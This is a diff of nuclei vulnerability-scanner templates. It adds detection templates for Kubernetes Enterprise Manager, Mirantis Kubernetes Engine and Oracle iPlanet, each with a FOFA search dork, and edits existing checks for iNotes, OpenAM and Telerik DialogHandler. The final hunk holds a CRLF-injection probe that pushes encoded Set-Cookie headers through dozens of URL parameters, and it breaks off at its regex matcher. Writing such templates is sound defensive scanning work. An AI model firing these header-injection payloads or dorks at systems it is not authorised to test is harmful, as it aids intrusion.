fofa-dork: 'app="Kubernetes-Enterprise-Manager"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Kubernetes Enterprise Manager"
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: kubernetes-mirantis
info:
name: Detect Mirantis Kubernetes Engine
author: pussycat0x
severity: info
tags: tech,kubernetes
additional-fields:
fofa-dork: 'app="Mirantis-Kubernetes-Engine"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Mirantis Kubernetes Engine"
- type: status
status:
- 200

View File

@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/iNotes/Forms85.nsf"
- "{{BaseURL}}/iNotes/Forms9.nsf"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -29,6 +29,7 @@ requests:
- "{{BaseURL}}/openam/json/serverinfo/*"
redirects: true
stop-at-first-match: true
max-redirects: 2
matchers-condition: and
matchers:

View File

@ -0,0 +1,25 @@
id: oracle-iplanet-web-server
info:
name: Detect Oracle-iPlanet-Web-Server
author: pussycat0x
severity: info
tags: tech,oracle
additional-fields:
fofa-dork: 'app="Oracle-iPlanet-Web-Server'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Oracle iPlanet Web Server"
- type: status
status:
- 200
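Review bot: the `fofa-dork` value `'app="Oracle-iPlanet-Web-Server'` is missing its closing double quote; the other templates in this commit use the `'app="..."'` form. It is harmless to nuclei because `additional-fields` is only an annotation, but it will break anyone copying the dork.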

View File

@ -29,6 +29,7 @@ requests:
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -20,6 +20,7 @@ requests:
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%
0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
stop-at-first-match: true
matchers:
- type: regex
regex:

Some files were not shown because too many files have changed in this diff.